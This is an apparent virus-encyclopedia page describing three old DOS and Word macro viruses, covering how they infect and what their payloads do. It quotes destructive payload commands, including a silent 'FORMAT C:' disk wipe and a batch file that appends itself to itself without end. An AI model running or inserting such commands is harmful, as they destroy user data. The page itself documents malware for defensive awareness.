Virus Database


DeadHead.992

Description DeadHead.992

It is a dangerous nonmemory resident encrypted parasitic virus. It searches for .COM files, then writes itself to the beginning of the file. The virus has bugs and often halts the system instead of infection. Depending on its data the virus corrupts the boot sector of the C: drive and displays the message:
[XtZ] by dEAdhEAd (StupidVir).

In case of error while infecting a file the virus displays the message and returns to DOS:
Incorrect D0S version

Check other viruses! Be aware! Use Antiviral Software

Macro.Word.Andry

Description Macro.Word.Andry

This encrypted virus contains only one macro AutoOpen and infects the global macro area on opening an infected document and writes itself to other documents when they are being opened.
On March 1st it sets to documents the password "Andry Christian", prints the text to status bar:
* I'M ANDRY CHRISTIAN, IF YOU THOUGHT, YOUR DOCUMENTS
OR TEMPLATES WERE SAFE, YOU WERE WRONG ! *

It then displays the dialog:
HACKERS Labs '96 - Hackware Technology Research
ANDRY [CHRISTIAN] WORD MACRO VIRUS IS HERE !!!
DO YOU SUPPORT MY VIRUS ?
YES NO

In case of "NO" key the virus overwrites the C:AUTOEXEC.BAT file with commands:
@ECHO OFF
CLS
ECHO Please wait . . .
FORMAT C: /U /C /S /AUTOTEST > NUL

and the C:CONFIG.SYS file with commands:
DOS=HIGH,UMB
FILES=40
BUFFERS=40
DEVICE=C:DOSHIMEM.SYS
DEVICE=C:DOSEMM386.EXE RAM

On the same date (March 1st) depending on the system time the virus runs the disk formatting command:
COMMAND /C FORMAT C: /U /C /S /AUTOTEST > NUL

Depending on the system time the virus inserts into current document the text:
Helloall.
Andry Christian
WordMacro Virus
Is Here....!!!

The virus also contains the comments:
'======================================================================'
' Source Code of Andry Christian WordMacro Virus 0.99 - ßeta Release '
'======================================================================'
' Virographer by Andry [Christian] in [Batavia] City, of INDONESIA '
' Viroright (C) 1996-1999 Hackware Technology Research - HACKERS Labs. '
' Multi Platform, Multi Infector, Stealth, OneMacro, Encryption, etc '
' Last Update by 01-Maret-1996 & 01:03 PM - Found Bugs...? Call Me '
'======================================================================'
' HACKERS Labs. -> WE ARE A BIG FAMILY OF THE VIRUS CREATOR's TEAM '
'======================================================================'

Macro.Word.Angus

Description Macro.Word.Angus

It is an encrypted Word macro virus, it contains nine macros:
Document NORMAL.DOT
FileClose FC
AutoOpen NOpen
FileSave
7 other FileSaveAs
with random FilePrint
names FilePrintDefault
FileTemplates
ToolsMacro
FileExit
PCGURU4

It infects global macros area on opening or closing an infected document (AutoOpen, FileClose). It infects documents on saving and saving with new name (FileSave, FileSaveAs). While infecting documents the virus stores renames its macros (see above) with random names and saves references to them to document's variables.
On October 23rd on printing documents the virus appends to the end of documents the message:
NAENBGOURSG
Hello from GREECE

On October 24th the virus creates and spawns the PCGURU4.BAT file that contains the instructions:
@echo off
Rem PcGuru4 virus by NAENBGOURSG
Rem Golden Version 4.3
type PcGuru4.bat >> PcGuru4.bat

Home

Viruses from A to Z
0-9 A B Ñ D E F G H I J
K L M N O P Q R S T
U V W X Y Z



Travel Articles
Free Article Directory
Online Cash Advance
Diet Hoodia Pill Uk

    Copyright © 2005 Virus-Database.com
© 2005 Virus-Database.com